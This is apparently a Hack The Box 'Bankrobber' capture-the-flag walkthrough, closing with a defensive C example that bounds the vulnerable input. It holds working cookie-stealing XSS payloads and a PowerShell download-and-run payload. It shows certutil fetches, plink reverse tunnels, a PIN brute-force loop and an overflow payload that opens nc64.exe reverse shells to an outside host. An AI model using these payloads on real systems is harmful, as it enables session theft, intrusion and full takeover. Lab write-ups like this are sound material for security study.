As always, first an nmap scan:
root@kali:~/htb/bankrobber# nmap -A 10.10.14.5 -oN AllPorts
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 06:24 EST
Nmap scan report for 10.10.14.5
Host is up (0.000051s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   2048 85:9c:65:7b:ec:db:65:ee:28:91:c7:2e:2f:e0:22:06 (RSA)
|   256 72:bb:d3:17:56:d4:0d:fe:cb:3e:64:c9:5c:7a:41:a6 (ECDSA)
|_  256 66:62:0f:03:e5:d8:7f:e1:e8:dd:f2:ab:17:4c:a1:fc (ED25519)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
8000/tcp open  http    SimpleHTTPServer 0.6 (Python 3.7.4)
|_http-server-header: SimpleHTTP/0.6 Python/3.7.4
|_http-title: Directory listing for /
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.88 seconds
Now we first create a new user, and then log in as this user.
Then catch the admin cookie:
<script>new Image().src="http://10.10.14.5:8000/bogus.php?output="+document.cookie;</script>
or
<img src=x onerror=this.src='http://10.10.14.5:8000/?c='+document.cookie>
root@kali:~/htb/# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.154 - - [29/Jan/2020 03:24:29] code 404, message File not found
10.10.10.154 - - [29/Jan/2020 03:24:29] "GET /bogus.php?output=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -
Then send an XSS payload that runs a PowerShell iwr script through backdoorchecker.php:
<script type="text/javascript">
var Http = new XMLHttpRequest();
var url = '/admin/backdoorchecker.php';
// backslashes are escaped so the JS string keeps them for the Windows paths
var params = 'cmd=dir|powershell -c "iwr -uri http://10.10.14.5:8000/nc64.exe -outfile %temp%\\a.exe";%temp%\\a.exe -e cmd.exe 10.10.14.5 1111';
Http.open("POST", url, true);
Http.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
Http.send(params);
</script>
If necessary, we check whether the admin auto-approved it (not strictly necessary, only for checking):
first edit the admin cookie,
then catch the user shell:
root@kali:~/htb/bankrobber# rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.154] 54090
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\admin>whoami
whoami
bankrobber\cortin

C:\xampp\htdocs\admin>cd c:\users\Cortin\Desktop

C:\Users\Cortin\Desktop>type user.txt
type user.txt
f635346600876a43441cf1c6e94769ac
c:\>mkdir temp
c:\temp>certutil -urlcache -split -f http://10.10.14.10:8000/plink.exe c:\Temp\plink.exe
c:\temp>.\plink.exe -R 3306:127.0.0.1:3306 10.10.14.10
root@kali:~/htb/bankrobber# mysql -u root -h 127.0.0.1 -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 1019
Server version: 10.1.38-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| bankrobber         |
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| test               |
+--------------------+
6 rows in set (0.091 sec)

MariaDB [(none)]> select LOAD_FILE('/Users/Administrator/Desktop/root.txt');
MariaDB [(none)]> select LOAD_FILE('/Users/Cortin/Desktop/user.txt');
Later, after brute-forcing the PIN (after a plink reverse tunnel: c:\temp\plink.exe -R 4466:127.0.0.1:910 10.10.14.5),
with a script
or
root@kali:~/htb/bankrobber# cat bandit.sh
for x in {0..9}{0..9}{0..9}{0..9}; do echo $x | nc 192.168.1.139 910 | egrep -v "correct"; echo "Try $x"; done
It turned out to be 0021.
C:\temp>certutil -urlcache -split -f http://10.10.14.5:8000/nc64.exe c:\temp\nc64.exe
C:\temp>certutil -urlcache -split -f http://10.10.14.5:8000/plink.exe c:\temp\plink.exe
C:\temp>.\plink.exe -R 4466:127.0.0.1:910 10.10.14.5
root@kali:~/htb/bankrobber# netstat -ano | grep 4455
tcp        0      0 127.0.0.1:4455          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp6       0      0 ::1:4455                :::*                    LISTEN      off (0.00/0/0)
root@kali:~/htb/bankrobber# nc 127.0.0.1 4455
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 0021
[$] PIN is correct, access granted!
--------------------------------------------------------------
Please enter the amount of e-coins you would like to transfer:
[$] 1
[$] Transfering $1 using our e-coin transfer application.
[$] Executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe
[$] Transaction in progress, you can safely disconnect...
c:\bankv2.exe is vulnerable to an "Integer Overflow".
It turned out, after asking on the forum, that the offset was about 32 'A' characters.
I used numbers instead of A's, so:
12345678901234567890123456789012
After these 32 characters comes the payload that gets executed.
My payload was:
12345678901234567890123456789012C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236
root@kali:~/htb/bankrobber# nc 127.0.0.1 4455
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 0021
[$] PIN correct, access granted!
--------------------------------------------------------------
Please enter the amount of e-coins you would like to transfer:
[$] 12345678901234567890123456789012C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236
[$] Transfering $12345678901234567890123456789012C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236 using our e-coin transfer application.
[$] Executing e-coin transfer tool: C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236
[$] Transaction in progress, you can safely disconnect...
root@kali:/opt/evil-winrm# rlwrap nc -nlvp 1236
listening on [any] 1236 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.154] 49759
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\users\admin\desktop
cd c:\users\admin\desktop

c:\Users\admin\Desktop>type root.txt
type root.txt
aa65d8e6216585ea636eb07d4a59b197

c:\Users\admin\Desktop>
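As an added illustration from the defender's side (not code from this page or from the box's authors), here is a hypothetical hardened version of the amount prompt shown above: the read is bounded to the 32-byte buffer, only digits are accepted, and the tool path is a constant that user input can never reach. The tool path is the one from the transcript above; the function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical hardened handler for a bankv2-style "amount" prompt. The binary
 * on the page reads the amount into a 32-byte buffer without a bound, so what
 * follows the first 32 characters lands in the adjacent command string and is
 * executed. Here the read is bounded and the tool path is never built from input. */

#define AMOUNT_MAX 31   /* 31 digits plus the NUL fit a 32-byte buffer */
#define TRANSFER_TOOL "C:\\Users\\admin\\Documents\\transfer.exe"  /* path from the transcript */

/* Returns 1 and fills amount[32] if input is 1..31 digits, else 0; never truncates. */
int parse_amount(const char *input, char amount[32])
{
    size_t n = strlen(input);
    if (n == 0 || n > AMOUNT_MAX)
        return 0;   /* the 32-digit prefix used on the page is rejected here */
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)input[i]))
            return 0;   /* a trailing "C:\temp\..." string is rejected here */
    memcpy(amount, input, n + 1);   /* bounded copy: at most 32 bytes including NUL */
    return 1;
}

/* Builds the command line from the constant tool path; returns its length or -1. */
int build_transfer_cmd(const char *input, char *cmd, size_t cmdlen)
{
    char amount[32];
    if (!parse_amount(input, amount))
        return -1;
    int w = snprintf(cmd, cmdlen, "\"%s\" %s", TRANSFER_TOOL, amount);
    return (w < 0 || (size_t)w >= cmdlen) ? -1 : w;
}

/* Convenience wrapper: length of the command built for input, or -1 if rejected. */
int transfer_cmd_len(const char *input)
{
    char cmd[256];
    return build_transfer_cmd(input, cmd, sizeof cmd);
}

int main(void)
{
    /* Constructed inputs: a normal amount and the overlong one used on the page. */
    printf("1 -> %d\n", transfer_cmd_len("1"));
    printf("overlong -> %d\n", transfer_cmd_len(
        "12345678901234567890123456789012C:\\temp\\nc64.exe -e cmd.exe 10.10.14.5 1236"));
    return 0;
}
```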
Author: Puckiestyle